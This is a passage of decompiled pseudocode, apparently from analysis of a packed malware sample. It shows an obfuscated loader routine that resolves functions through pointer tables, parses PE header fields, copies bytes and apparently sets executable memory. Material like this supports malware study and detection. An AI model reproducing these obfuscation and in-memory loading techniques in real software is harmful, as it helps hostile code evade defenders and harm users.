                  				signed int _t824;
                  				void* _t827;
                  				void* _t828;
                  				void* _t830;
                  				signed int _t836;
                  				signed int _t840;
                  				signed int _t842;
                  				signed int _t844;
                  				signed int _t851;
                  				signed int _t856;
                  				signed int _t859;
                  				signed int _t862;
                  				signed int _t865;
                  				signed int _t867;
                  				signed int _t869;
                  				signed int _t875;
                  				signed int _t882;
                  				void* _t888;
                  				signed int _t889;
                  				signed int _t893;
                  				signed int _t896;
                  				signed int _t901;
                  				signed int _t906;
                  				signed int _t908;
                  				signed int _t916;
                  				signed int _t920;
                  				signed int _t924;
                  				signed int _t926;
                  				signed int _t928;
                  				signed int _t931;
                  				signed int _t934;
                  				signed int _t936;
                  				signed int _t939;
                  				signed int _t945;
                  				signed int _t947;
                  				signed int _t950;
                  				signed int _t953;
                  				signed int _t955;
                  				signed int _t958;
                  				void* _t966;
                  				signed int _t969;
                  				signed int _t975;
                  				signed int _t977;
                  				signed int _t979;
                  				signed int _t981;
                  				signed int _t986;
                  				signed int _t987;
                  				signed int _t1002;
                  				signed int _t1005;
                  				signed int _t1009;
                  				signed int _t1012;
                  				signed int _t1015;
                  				signed int _t1018;
                  				signed int _t1020;
                  				signed int _t1023;
                  				signed int _t1026;
                  				signed int _t1028;
                  				signed int _t1031;
                  				signed int _t1034;
                  				signed int _t1035;
                  				void* _t1036;
                  				long _t1041;
                  				void* _t1043;
                  				signed int _t1045;
                  				signed int _t1052;
                  				signed int _t1054;
                  				signed int _t1057;
                  				signed int _t1060;
                  				signed int _t1063;
                  				signed int _t1065;
                  				signed int _t1068;
                  				void* _t1069;
                  				signed int _t1071;
                  				signed int _t1074;
                  				void* _t1077;
                  				signed int _t1078;
                  				signed int _t1081;
                  				signed int _t1085;
                  				void* _t1089;
                  				signed int _t1091;
                  				void* _t1097;
                  				void* _t1102;
                  				signed int _t1103;
                  				signed int _t1106;
                  				void* _t1109;
                  				signed int _t1112;
                  				signed int _t1119;
                  				signed int* _t1120;
                  				signed int* _t1121;
                  				signed int* _t1122;
                  				signed int* _t1123;
                  				signed int* _t1124;
                  				signed int* _t1125;
                  				signed int* _t1126;
                  				signed int* _t1127;
                  				signed int* _t1128;
                  				signed int* _t1129;
                  				signed int* _t1130;
                  				signed int* _t1131;
                  				signed int* _t1132;
                  				signed int* _t1133;
                  				signed int* _t1134;
                  				signed int* _t1136;
                  				signed int* _t1139;
                  				signed int* _t1140;
                  				signed int* _t1141;
                  				signed int* _t1142;
                  				signed int* _t1143;
                  				signed int* _t1144;
                  
                  				_t1063 = __esi;
                  				_t813 = __ebx;
                  				_push(__eax);
                  				 *_t1119 =  *_t1119 & 0x00000000;
                  				 *_t1119 =  *_t1119 + _t1102;
                  				_t1103 = _t1119;
                  				_t1120 = _t1119 + 0xfffffff0;
                  				_push(_t1103);
                  				 *_t1120 =  *_t1120 & 0x00000000;
                  				 *_t1120 =  *_t1120 + __ecx;
                  				_push(__ecx);
                  				 *_t1120 =  *_t1120 & 0x00000000;
                  				 *_t1120 =  *_t1120 ^ __edx;
                  				_push(_t1103);
                  				 *_t1120 =  *_t1120 ^ _t1103;
                  				 *_t1120 =  *_t1120 ^ __ebx + 0x0041cca8;
                  				_v16 = _v16 & 0x00000000;
                  				_push(_v16);
                  				 *_t1120 =  *_t1120 + __ebx + 0x41cd5f;
                  				_push( *((intOrPtr*)(__ebx + 0x41f068))());
                  				_pop( *_t7);
                  				_push(_v16);
                  				_pop( *_t9);
                  				_pop( *_t10);
                  				_t920 = _v16;
                  				_t1121 = _t1120 - 0xfffffffc;
                  				_push(__esi);
                  				 *_t1121 =  *_t1121 ^ __esi;
                  				 *_t1121 =  *_t1120;
                  				_push(_v16);
                  				 *_t1121 = _t920;
                  				_push(_t1002);
                  				 *_t1121 =  *_t1121 - _t1002;
                  				 *_t1121 =  *_t1121 ^ __ebx + 0x0041c01b;
                  				_t610 =  *((intOrPtr*)(__ebx + 0x41f060))();
                  				_push(_v16);
                  				 *_t1121 = _t610;
                  				_push(__esi);
                  				 *_t1121 =  *_t1121 & 0x00000000;
                  				 *_t1121 =  *_t1121 + __ebx + 0x41c678;
                  				_t612 =  *((intOrPtr*)(__ebx + 0x41f060))();
                  				_pop( *_t18);
                  				_push(_t920);
                  				 *_t20 = _t612;
                  				_v20 = _v20 + _v20;
                  				_push(_v20);
                  				_pop(_t613);
                  				_v20 = _t613;
                  				_t836 = 0 ^  *(__ebx + 0x41c55d);
                  				if(_t836 > _v20) {
                  					_push(_v12);
                  					 *_t1121 = __ebx + 0x41c01b;
                  					_push(_t1103);
                  					 *_t1121 =  *_t1121 ^ _t1103;
                  					 *_t1121 =  *_t1121 + __ebx + 0x41c678;
                  					_push( *((intOrPtr*)(__ebx + 0x41f064))());
                  					_pop( *_t31);
                  					_push(_v20);
                  					_pop( *_t33);
                  				}
                  				_pop( *_t34);
                  				_t924 = _v20;
                  				 *_t1121 =  *_t1121 & 0x00000000;
                  				 *_t1121 =  *_t1121 + _t924;
                  				 *_t1121 =  *_t1121 & 0x00000000;
                  				 *_t1121 =  *_t1121 | _t813 + 0x0041c8b2;
                  				 *_t1121 =  *_t1121 & 0x00000000;
                  				 *_t1121 =  *_t1121 + _t813 + 0x41d167;
                  				_t619 =  *((intOrPtr*)(_t813 + 0x41f068))(_t924, _t924, _t836);
                  				_v12 = _t836;
                  				 *((intOrPtr*)(_t813 + 0x41c883)) = _t619;
                  				 *_t1121 = _t813 + 0x41c565;
                  				_v12 = 0;
                  				 *_t1121 =  *_t1121 | _t813 + 0x0041c574;
                  				_push( *((intOrPtr*)(_t813 + 0x41f060))(_v12, _v20));
                  				_pop( *_t48);
                  				_push(_v20);
                  				_pop( *_t50);
                  				_pop( *_t51);
                  				 *_t1121 =  *_t1121 - _t1103;
                  				 *_t1121 =  *_t1121 ^ _v20;
                  				 *_t1121 =  *_t1121 ^ _t813;
                  				 *_t1121 =  *_t1121 + _t813 + 0x41cd20;
                  				_push( *((intOrPtr*)(_t813 + 0x41f060))(_t813, _t1103));
                  				_pop( *_t55);
                  				_push(_v16);
                  				_pop( *_t57);
                  				_t626 =  *((intOrPtr*)(_t813 + 0x41f060))();
                  				_v16 = _v16 & 0x00000000;
                  				 *_t1121 =  *_t1121 + _t626;
                  				_v16 = _v16 & 0x00000000;
                  				 *_t1121 =  *_t1121 + _t813 + 0x41c3ee;
                  				_t628 =  *((intOrPtr*)(_t813 + 0x41f060))(_v16, _v16);
                  				 *_t1121 =  *_t1121 ^ _t924;
                  				 *_t1121 =  *_t1121 + _t628;
                  				_v12 = _v12 & 0x00000000;
                  				 *_t1121 =  *_t1121 | _t813 + 0x0041cfe9;
                  				_t630 =  *((intOrPtr*)(_t813 + 0x41f060))(_v12, _t924);
                  				_pop( *_t72);
                  				_t840 = _v20;
                  				 *_t74 = _t630;
                  				_v20 = _v20 + _t840;
                  				_push(_v20);
                  				_pop(_t631);
                  				_t1065 = _t1063;
                  				_t842 = _t840 & 0x00000000 | _t1103 & 0x00000000 ^  *(_t813 + 0x41ca09);
                  				_t1106 = _t1103;
                  				if(_t842 > _t631) {
                  					 *_t1121 =  *_t1121 & 0x00000000;
                  					 *_t1121 =  *_t1121 + _t813 + 0x41c3ee;
                  					 *_t1121 = _t813 + 0x41cfe9;
                  					_t631 =  *((intOrPtr*)(_t813 + 0x41f064))(_v12, _t813);
                  					_push(_t924);
                  					 *(_t813 + 0x41c365) =  *(_t813 + 0x41c365) & 0x00000000;
                  					 *(_t813 + 0x41c365) =  *(_t813 + 0x41c365) ^ _t924 & 0x00000000 ^ _t631;
                  				}
                  				_t633 = _t631 & 0x00000000 ^  *_t1121;
                  				_t1122 =  &(_t1121[1]);
                  				 *_t1122 = _t1002;
                  				 *(_t813 + 0x41d240) = _t633;
                  				_t1005 = 0;
                  				_pop( *_t88);
                  				_t926 = 0 ^ _v20;
                  				_pop( *_t90);
                  				_t844 = _t842 & 0x00000000 ^ _v16;
                  				 *_t1122 =  *_t1122 & 0x00000000;
                  				 *_t1122 =  *_t1122 ^ _t926;
                  				 *_t1122 =  *_t1122 & 0x00000000;
                  				 *_t1122 =  *_t1122 | _t844;
                  				 *_t1122 =  *_t1122 & 0x00000000;
                  				 *_t1122 =  *_t1122 ^ _t813 + 0x0041c624;
                  				_v12 = _v12 & 0x00000000;
                  				 *_t1122 =  *_t1122 ^ _t813 + 0x0041d36b;
                  				_t636 =  *((intOrPtr*)(_t813 + 0x41f068))(_v12, _t926, _t1005, _t633);
                  				 *(_t813 + 0x41c655) =  *(_t813 + 0x41c655) & 0x00000000;
                  				 *(_t813 + 0x41c655) =  *(_t813 + 0x41c655) | _t844 -  *_t1122 ^ _t636;
                  				_t1123 =  &(_t1122[1]);
                  				_v16 = _v16 & 0x00000000;
                  				 *_t1123 =  *_t1123 ^  *_t1122;
                  				_v16 = 0;
                  				 *_t1123 =  *_t1123 ^ _t813 + 0x0041c891;
                  				_t638 =  *((intOrPtr*)(_t813 + 0x41f060))(_v16, _v16, _t844);
                  				 *_t1123 =  *_t1123 - _t1106;
                  				 *_t1123 =  *_t1123 | _t638;
                  				_v12 = 0;
                  				 *_t1123 =  *_t1123 ^ _t813 + 0x0041c30f;
                  				_t640 =  *((intOrPtr*)(_t813 + 0x41f060))(_v12, _t1106);
                  				_t851 =  *_t1123;
                  				_t1124 =  &(_t1123[1]);
                  				 *_t113 = _t640;
                  				_v16 = _v16 + _t851;
                  				_push(_v16);
                  				_pop(_t641);
                  				_t928 = _t926;
                  				_v16 = _t1005;
                  				if((_t851 & 0x00000000 | _t1005 ^ _v16 |  *(_t813 + 0x41ca38)) > _t641) {
                  					_v20 = _v20 & 0x00000000;
                  					 *_t1124 =  *_t1124 | _t813 + 0x0041c891;
                  					_v12 = 0;
                  					 *_t1124 =  *_t1124 + _t813 + 0x41c30f;
                  					_t641 =  *((intOrPtr*)(_t813 + 0x41f064))(_v12, _v20);
                  				}
                  				 *_t1124 = _t928;
                  				 *((intOrPtr*)(_t813 + 0x41c910)) = _t641;
                  				_t931 = 0;
                  				_v12 = _t1065;
                  				_t1068 = _v12;
                  				_v12 = 0;
                  				 *_t1124 =  *_t1124 | 0 ^ _a4;
                  				_v16 = 0;
                  				 *_t1124 =  *_t1124 | _t813 + 0x0041c9ef;
                  				_t644 =  *((intOrPtr*)(_t813 + 0x41f060))(_v16, _v12);
                  				_v12 = 0;
                  				 *_t1124 =  *_t1124 ^ _t644;
                  				 *_t1124 = _t813 + 0x41cb65;
                  				_t646 =  *((intOrPtr*)(_t813 + 0x41f060))(_v20, _v12);
                  				_t1125 =  &(_t1124[1]);
                  				_v12 = _t931;
                  				_push( *_t1124 + _t646);
                  				_t934 = _v12;
                  				_pop(_t647);
                  				_v12 = _t647;
                  				_t856 = 0 ^  *(_t813 + 0x41c187);
                  				_t650 = _v12;
                  				if(_t856 > _t650) {
                  					_v20 = 0;
                  					 *_t1125 =  *_t1125 | _t813 + 0x0041c9ef;
                  					 *_t1125 =  *_t1125 ^ _t856;
                  					 *_t1125 =  *_t1125 + _t813 + 0x41cb65;
                  					_t650 =  *((intOrPtr*)(_t813 + 0x41f064))(_t856, _v20);
                  					_v16 = _t1068;
                  					 *(_t813 + 0x41c651) =  *(_t813 + 0x41c651) & 0x00000000;
                  					 *(_t813 + 0x41c651) =  *(_t813 + 0x41c651) | _t1068 ^ _v16 | _t650;
                  					_t1068 = _v16;
                  				}
                  				_t652 = _t650 & 0x00000000 ^  *_t1125;
                  				_t1126 = _t1125 - 0xfffffffc;
                  				 *_t162 = _t652;
                  				_v16 = _v16 +  *((intOrPtr*)(_t652 + 0x3c));
                  				_push(_v16);
                  				_pop(_t653);
                  				_t936 = _t934;
                  				 *_t1126 = _t653;
                  				 *_t1126 =  *_t1126 & 0x00000000;
                  				 *_t1126 =  *_t1126 ^ _t813 + 0x0041c16e;
                  				 *_t1126 = _t813 + 0x41ce8a;
                  				_t656 =  *((intOrPtr*)(_t813 + 0x41f068))(_v20, _t1068, _v20);
                  				 *_t1126 = _t1106;
                  				 *((intOrPtr*)(_t813 + 0x41c0cc)) = _t656;
                  				_t1109 = 0;
                  				_t658 =  *_t1126;
                  				_t1127 =  &(_t1126[1]);
                  				 *_t1127 = _t658;
                  				 *_t1127 =  *_t1127 - _t856;
                  				 *_t1127 =  *_t1127 ^ _t658;
                  				 *_t1127 =  *_t1127 - _t936;
                  				 *_t1127 =  *_t1127 + _t813 + 0x41c791;
                  				_v12 = _v12 & 0x00000000;
                  				 *_t1127 =  *_t1127 ^ _t813 + 0x0041ca02;
                  				_t661 =  *((intOrPtr*)(_t813 + 0x41f068))(_v12, _t936, _t856, _v16);
                  				 *_t1127 = _t936;
                  				 *(_t813 + 0x41c9e0) = 0 ^ _t661;
                  				_t939 = 0;
                  				_t1128 = _t1127 - 0xfffffffc;
                  				_v20 = _t813;
                  				_t1009 =  *_t1127;
                  				_t816 = _v20;
                  				_v12 = 0;
                  				 *_t1128 =  *_t1128 | _t816 + 0x0041c000;
                  				_t665 =  *((intOrPtr*)(_t816 + 0x41f060))(_v12);
                  				 *_t1128 =  *_t1128 ^ _t1009;
                  				 *_t1128 = _t665;
                  				 *_t1128 =  *_t1128 - _t1009;
                  				 *_t1128 =  *_t1128 ^ _t816 + 0x0041cc73;
                  				_t667 =  *((intOrPtr*)(_t816 + 0x41f060))(_t1009, _t1009);
                  				_t1129 =  &(_t1128[1]);
                  				 *_t1129 =  *_t1129 ^ _t1068;
                  				_t1069 = _t667;
                  				_t668 = _t1069 + (_t856 & 0x00000000 |  *_t1128);
                  				_t1071 = 0;
                  				_v20 = _t1009;
                  				_t859 = 0 ^  *(_t816 + 0x41c250);
                  				_t1012 = _v20;
                  				if(_t859 > _t668) {
                  					 *_t1129 =  *_t1129 - _t1012;
                  					 *_t1129 =  *_t1129 ^ _t816 + 0x0041c000;
                  					_v12 = 0;
                  					 *_t1129 =  *_t1129 | _t816 + 0x0041cc73;
                  					_t668 =  *((intOrPtr*)(_t816 + 0x41f064))(_v12, _t1012);
                  				}
                  				 *(_t816 + 0x41c695) =  *(_t816 + 0x41c695) & 0x00000000;
                  				 *(_t816 + 0x41c695) =  *(_t816 + 0x41c695) | _t859 & 0x00000000 ^ _t668;
                  				_t862 = _t859;
                  				 *_t1129 =  *_t1129 - _t1071;
                  				 *_t1129 =  *_t1129 + ( *(_t1012 + 6) & 0x0000ffff);
                  				 *_t1129 = _t816 + 0x41ca88;
                  				_t671 =  *((intOrPtr*)(_t816 + 0x41f060))(_v12, _t1071);
                  				_v20 = _t862;
                  				 *(_t816 + 0x41d151) =  *(_t816 + 0x41d151) & 0x00000000;
                  				 *(_t816 + 0x41d151) =  *(_t816 + 0x41d151) | _t862 ^ _v20 ^ _t671;
                  				_t865 = _v20;
                  				_pop( *_t211);
                  				_v8 = _v8 & 0x00000000;
                  				_v8 = _v8 ^ (_t816 & 0x00000000 | 0 ^ _v16);
                  				_t819 = _t816;
                  				 *_t1129 =  *_t1129 & 0x00000000;
                  				 *_t1129 =  *_t1129 ^ _t819 + 0x0041c863;
                  				_t675 =  *((intOrPtr*)(_t819 + 0x41f060))(_t819);
                  				 *(_t819 + 0x41c2ac) =  *(_t819 + 0x41c2ac) & 0x00000000;
                  				 *(_t819 + 0x41c2ac) =  *(_t819 + 0x41c2ac) | _t1109 -  *_t1129 ^ _t675;
                  				_t1112 = _t1109;
                  				 *_t1129 =  *_t1129 - _t865;
                  				 *_t1129 =  *_t1129 ^ _t1012;
                  				 *_t1129 = _t819 + 0x41ca0d;
                  				_t677 =  *((intOrPtr*)(_t819 + 0x41f060))(_v12, _t865);
                  				 *_t1129 = _t677;
                  				 *_t1129 = _t819 + 0x41cbe6;
                  				_t679 =  *((intOrPtr*)(_t819 + 0x41f060))(_v12, _v20);
                  				_t867 =  *_t1129;
                  				_t1130 = _t1129 - 0xfffffffc;
                  				 *_t230 = _t679;
                  				_v16 = _v16 + _t867;
                  				_push(_v16);
                  				_pop(_t680);
                  				_t821 = _t819;
                  				_t869 = _t867 & 0x00000000 | _t1071 & 0x00000000 ^  *(_t821 + 0x41d053);
                  				_t1074 = _t1071;
                  				if(_t869 > _t680) {
                  					_t235 = _t821 + 0x41ca0d; // 0x41ca0d
                  					_v12 = 0;
                  					 *_t1130 =  *_t1130 | _t235;
                  					_t238 = _t821 + 0x41cbe6; // 0x41cbe6
                  					 *_t1130 =  *_t1130 & 0x00000000;
                  					 *_t1130 =  *_t1130 + _t238;
                  					_t680 =  *((intOrPtr*)(_t821 + 0x41f064))(_t1074, _v12);
                  				}
                  				 *_t1130 = _t1012;
                  				 *(_t821 + 0x41c918) = 0 ^ _t680;
                  				_t1015 = 0;
                  				_v16 = _t869;
                  				_v16 = 0;
                  				 *_t1130 =  *_t1130 + (_t939 & 0x00000000 | _t869 ^ _v16 |  *(_t1015 + 0x54));
                  				_t247 = _t821 + 0x41d093; // 0x41d093
                  				 *_t1130 =  *_t1130 & 0x00000000;
                  				 *_t1130 =  *_t1130 | _t247;
                  				_t682 =  *((intOrPtr*)(_t821 + 0x41f060))(_v16);
                  				 *_t1130 = _t1015;
                  				 *(_t821 + 0x41c4f0) = 0 ^ _t682;
                  				_t1018 = 0;
                  				 *_t250 = _t821;
                  				_t1020 = _t1018 & 0x00000000 ^ (_t1074 ^  *_t1130 |  *(_t821 + 0x41c166));
                  				_t1077 = _t1074;
                  				 *_t1130 =  *_t1130 & 0x00000000;
                  				 *_t1130 =  *_t1130 ^ _v16;
                  				_t253 = _t821 + 0x41cfd9; // 0x41cfd9
                  				_v20 = 0;
                  				 *_t1130 =  *_t1130 | _t253;
                  				_t684 =  *((intOrPtr*)(_t821 + 0x41f060))(_v20, _t1077);
                  				_v20 = _t1020;
                  				 *(_t821 + 0x41c323) =  *(_t821 + 0x41c323) & 0x00000000;
                  				 *(_t821 + 0x41c323) =  *(_t821 + 0x41c323) | _t1020 ^ _v20 ^ _t684;
                  				_t1023 = _v20;
                  				_t1131 =  &(_t1130[1]);
                  				 *_t1131 = _t684;
                  				_t1078 = _a4;
                  				_v12 = _v12 & 0x00000000;
                  				 *_t1131 =  *_t1131 |  *_t1130;
                  				_t268 = _t821 + 0x41ca9e; // 0x41ca9e
                  				_v12 = _v12 & 0x00000000;
                  				 *_t1131 =  *_t1131 | _t268;
                  				_t689 =  *((intOrPtr*)(_t821 + 0x41f060))(_v12, _v12, 0);
                  				 *_t1131 =  *_t1131 & 0x00000000;
                  				 *_t1131 =  *_t1131 | _t689;
                  				_t273 = _t821 + 0x41c931; // 0x41c931
                  				 *_t1131 =  *_t1131 & 0x00000000;
                  				 *_t1131 =  *_t1131 | _t273;
                  				_t691 =  *((intOrPtr*)(_t821 + 0x41f060))(_v16);
                  				 *_t275 = _t1023;
                  				_v20 = _t821;
                  				_push(0 + _v16 + _t691);
                  				_t824 = _v20;
                  				_pop(_t692);
                  				_push( *((intOrPtr*)(_t824 + 0x41cccf)));
                  				_pop( *_t280);
                  				_push(_v12);
                  				_pop(_t875);
                  				if(_t875 > _t692) {
                  					 *_t1131 = _t824 + 0x41ca9e;
                  					 *_t1131 =  *_t1131 & 0x00000000;
                  					 *_t1131 =  *_t1131 ^ _t824 + 0x0041c931;
                  					_t692 =  *((intOrPtr*)(_t824 + 0x41f064))(_t1078, _v16);
                  					 *_t286 = _t692;
                  					_push(_v16);
                  					_pop( *_t288);
                  				}
                  				_pop( *_t289);
                  				_t945 = _v12;
                  				_v12 = _t692;
                  				 *_t1131 = _t875 & 0x00000000 | _t692 ^ _v12 | _t945;
                  				 *_t1131 =  *_t1131 ^ _t824;
                  				 *_t1131 =  *_t1131 + _t945;
                  				_v12 = 0;
                  				 *_t1131 =  *_t1131 ^ _t824 + 0x0041d1ba;
                  				 *_t1131 = _t824 + 0x41c856;
                  				_t698 =  *((intOrPtr*)(_t824 + 0x41f068))(_v16, _v12, _t824, _v12);
                  				_v20 = _t1078;
                  				 *(_t824 + 0x41c0c8) = 0 ^ _t698;
                  				_t1081 = _v20;
                  				_pop( *_t304);
                  				_t947 = 0 ^ _v20;
                  				_t879 = 0 ^  *_t1131;
                  				_t1132 = _t1131 - 0xfffffffc;
                  				if(_t1023 != _t1081) {
                  					 *_t1132 =  *_t1132 - _t1023;
                  					 *_t1132 =  *_t1132 ^ _t879;
                  					_v20 = _v20 & 0x00000000;
                  					 *_t1132 =  *_t1132 + _t947;
                  					_v16 = 0;
                  					 *_t1132 =  *_t1132 ^ _t824 + 0x0041c7a9;
                  					_t739 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v20, _t1023);
                  					_v12 = 0;
                  					 *_t1132 =  *_t1132 + _t739;
                  					 *_t1132 =  *_t1132 & 0x00000000;
                  					 *_t1132 =  *_t1132 ^ _t824 + 0x0041d026;
                  					_t741 =  *((intOrPtr*)(_t824 + 0x41f060))(_t824, _v12);
                  					_t1139 = _t1132 - 0xfffffffc;
                  					 *_t317 = _t741;
                  					_v20 = _v20 + (_t879 & 0x00000000) +  *_t1132;
                  					_push(_v20);
                  					_pop(_t742);
                  					_t1045 = _t1023;
                  					_push(0);
                  					 *_t1139 = _t1045;
                  					_t906 = 0 ^  *(_t824 + 0x41c244);
                  					if(_t906 > _t742) {
                  						 *_t1139 =  *_t1139 ^ _t906;
                  						 *_t1139 =  *_t1139 | _t824 + 0x0041c7a9;
                  						 *_t1139 =  *_t1139 & 0x00000000;
                  						 *_t1139 =  *_t1139 + _t824 + 0x41d026;
                  						_t797 =  *((intOrPtr*)(_t824 + 0x41f064))(_t824, _t906);
                  						_push(0);
                  						 *_t1139 = _t947;
                  						 *(_t824 + 0x41cf47) = 0 ^ _t797;
                  					}
                  					_pop( *_t326);
                  					_t969 = _v12;
                  					_t908 =  *_t1139;
                  					_t1140 = _t1139 - 0xfffffffc;
                  					do {
                  						asm("movsb");
                  						_v12 = 0;
                  						 *_t1140 =  *_t1140 + _t908;
                  						_v12 = _v12 & 0x00000000;
                  						 *_t1140 =  *_t1140 + _t969;
                  						 *_t1140 =  *_t1140 - _t969;
                  						 *_t1140 =  *_t1140 | _t824 + 0x0041c831;
                  						_t744 =  *((intOrPtr*)(_t824 + 0x41f060))(_t969, _v12, _v12);
                  						 *_t1140 =  *_t1140 ^ _t1112;
                  						 *_t1140 =  *_t1140 ^ _t744;
                  						 *_t1140 =  *_t1140 & 0x00000000;
                  						 *_t1140 =  *_t1140 ^ _t824 + 0x0041c7fa;
                  						_t746 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1081, _t1112);
                  						_t1141 =  &(_t1140[1]);
                  						 *_t337 = _t746;
                  						_v20 = _v20 +  *_t1140;
                  						_push(_v20);
                  						_pop(_t747);
                  						_t1081 = _t1081;
                  						_v12 = _t747;
                  						if((0 ^  *(_t824 + 0x41c054)) > _v12) {
                  							 *_t1141 = _t824 + 0x41c831;
                  							 *_t1141 = _t824 + 0x41c7fa;
                  							_t794 =  *((intOrPtr*)(_t824 + 0x41f064))(_v16, _v16);
                  							_v16 = _t969;
                  							 *((intOrPtr*)(_t824 + 0x41c254)) = _t794;
                  						}
                  						_pop( *_t352);
                  						_t969 = 0 + _v12;
                  						_t1140 = _t1141 - 0xfffffffc;
                  						_t908 =  *_t1141 - 1;
                  					} while (_t908 != 0);
                  					 *_t1140 =  *_t1140 & 0x00000000;
                  					 *_t1140 =  *_t1140 ^ _t969;
                  					 *_t1140 =  *_t1140 & 0x00000000;
                  					 *_t1140 =  *_t1140 ^ _t824 + 0x0041ccd3;
                  					_v20 = 0;
                  					 *_t1140 =  *_t1140 ^ _t824 + 0x0041c339;
                  					_t753 =  *((intOrPtr*)(_t824 + 0x41f068))(_v20, _t908, _t908);
                  					 *(_t824 + 0x41d2bf) =  *(_t824 + 0x41d2bf) & 0x00000000;
                  					 *(_t824 + 0x41d2bf) =  *(_t824 + 0x41d2bf) ^ _t969 ^  *_t1140 ^ _t753;
                  					_t975 =  *_t1140;
                  					_t1142 = _t1140 - 0xfffffffc;
                  					_v12 = _t753;
                  					_t756 = _v12;
                  					 *_t1142 =  *_t1142 ^ _t756;
                  					 *_t1142 =  *_t1142 ^ _t975;
                  					_v20 = _v20 & 0x00000000;
                  					 *_t1142 =  *_t1142 ^ _t824 + 0x0041c8b7;
                  					_push( *((intOrPtr*)(_t824 + 0x41f060))(_v20, _t756, _t969));
                  					_pop( *_t371);
                  					_push(_v16);
                  					_pop( *_t373);
                  					_pop( *_t374);
                  					_t977 = _t975 & 0x00000000 ^ _v16;
                  					 *(_t824 + 0x41c60a) = 0x40;
                  					 *_t1142 = _t977;
                  					_v16 = 0;
                  					 *_t1142 =  *_t1142 ^ _t824 + 0x0041c4cb;
                  					_t760 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v20);
                  					 *_t1142 = _t760;
                  					 *_t1142 = _t824 + 0x41c438;
                  					_t762 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v12);
                  					_pop( *_t386);
                  					 *_t1142 =  *_t1142 | _t824;
                  					_t830 = _t762;
                  					_t824 = 0;
                  					_v16 =  *((intOrPtr*)(_t824 + 0x41c166));
                  					_t916 =  *(_t824 + 0x41d118);
                  					_t1052 = _v16;
                  					if(_t916 > _t830 + _v20 + (_t908 & 0x00000000)) {
                  						_t391 = _t824 + 0x41c4cb; // 0x41c4cb
                  						 *_t1142 =  *_t1142 - _t916;
                  						 *_t1142 =  *_t1142 + _t391;
                  						_t392 = _t824 + 0x41c438; // 0x41c438
                  						 *_t1142 =  *_t1142 ^ _t977;
                  						 *_t1142 =  *_t1142 | _t392;
                  						_t791 =  *((intOrPtr*)(_t824 + 0x41f064))(_t977, _t916);
                  						_v20 = _t977;
                  						 *(_t824 + 0x41c583) =  *(_t824 + 0x41c583) & 0x00000000;
                  						 *(_t824 + 0x41c583) =  *(_t824 + 0x41c583) | _t977 - _v20 ^ _t791;
                  					}
                  					_t979 =  *_t1142;
                  					_t1143 = _t1142 - 0xfffffffc;
                  					_t401 = _t824 + 0x41c60a; // 0x41c60a
                  					 *_t1143 =  *_t1143 - _t979;
                  					 *_t1143 =  *_t1143 ^ _t401;
                  					 *_t1143 = _t979;
                  					_t403 = _t824 + 0x41cb46; // 0x41cb46
                  					 *_t1143 =  *_t1143 & 0x00000000;
                  					 *_t1143 =  *_t1143 + _t403;
                  					_t404 = _t824 + 0x41c91c; // 0x41c91c
                  					 *_t1143 = _t404;
                  					_t767 =  *((intOrPtr*)(_t824 + 0x41f068))(_v20, _t824, _v16, _t979);
                  					 *_t1143 = _t1081;
                  					 *(_t824 + 0x41cf40) = 0 ^ _t767;
                  					_t1097 = 0;
                  					_t981 =  *_t1143;
                  					_t1144 =  &(_t1143[1]);
                  					_pop( *_t408);
                  					 *_t1144 =  *_t1144 & 0x00000000;
                  					 *_t1144 =  *_t1144 + (0 ^ _v20);
                  					 *_t1144 = _t981;
                  					_t411 = _t824 + 0x41cc6e; // 0x41cc6e
                  					 *_t1144 = _t411;
                  					_t771 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v16, _t916);
                  					 *(_t824 + 0x41c082) =  *(_t824 + 0x41c082) & 0x00000000;
                  					 *(_t824 + 0x41c082) =  *(_t824 + 0x41c082) ^ _t981 & 0x00000000 ^ _t771;
                  					 *_t418 = _t981;
                  					_t986 = _v12;
                  					 *_t1144 = 2;
                  					_v12 = _v12 & 0x00000000;
                  					 *_t1144 =  *_t1144 ^ _t986;
                  					_t423 = _t824 + 0x41cfff; // 0x41cfff
                  					 *_t1144 =  *_t1144 & 0x00000000;
                  					 *_t1144 =  *_t1144 ^ _t423;
                  					_t773 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1112, _v12, _t824);
                  					 *_t1144 =  *_t1144 & 0x00000000;
                  					 *_t1144 =  *_t1144 + _t773;
                  					_t425 = _t824 + 0x41c3b9; // 0x41c3b9
                  					 *_t1144 =  *_t1144 - _t1112;
                  					 *_t1144 =  *_t1144 | _t425;
                  					_t775 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1112, _t986);
                  					_t1132 =  &(_t1144[1]);
                  					 *_t427 = _t775;
                  					_v20 = _v20 + (_t916 & 0x00000000 |  *_t1144);
                  					_push(_v20);
                  					_pop(_t776);
                  					_t1054 = _t1052;
                  					 *_t1132 = _t1054;
                  					_t879 =  *(_t824 + 0x41d0fa);
                  					_t1057 = 0;
                  					if(_t879 > _t776) {
                  						_t432 = _t824 + 0x41cfff; // 0x41cfff
                  						 *_t1132 =  *_t1132 - _t1112;
                  						 *_t1132 =  *_t1132 + _t432;
                  						_t433 = _t824 + 0x41c3b9; // 0x41c3b9
                  						 *_t1132 =  *_t1132 ^ _t1112;
                  						 *_t1132 =  *_t1132 + _t433;
                  						_t788 =  *((intOrPtr*)(_t824 + 0x41f064))(_t1112, _t1112);
                  						_v12 = _t1097;
                  						 *((intOrPtr*)(_t824 + 0x41d019)) = _t788;
                  						_t1097 = _v12;
                  					}
                  					_pop( *_t438);
                  					_t987 = _v12;
                  					 *_t1132 =  *_t1132 ^ _t824;
                  					 *_t1132 = _t987;
                  					_t440 = _t824 + 0x41c42d; // 0x41c42d
                  					 *_t1132 =  *_t1132 - _t1097;
                  					 *_t1132 =  *_t1132 + _t440;
                  					_t778 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1097, _t824);
                  					 *_t1132 = _t1057;
                  					 *((intOrPtr*)(_t824 + 0x41c664)) = _t778;
                  					_t1060 = 0;
                  					_v16 = _v16 & 0x00000000;
                  					 *_t1132 =  *_t1132 + _t1060;
                  					_t446 = _t824 + 0x41c4b9; // 0x41c4b9
                  					_v12 = 0;
                  					 *_t1132 =  *_t1132 + _t446;
                  					_t449 = _t824 + 0x41c298; // 0x41c298
                  					 *_t1132 =  *_t1132 ^ _t1097;
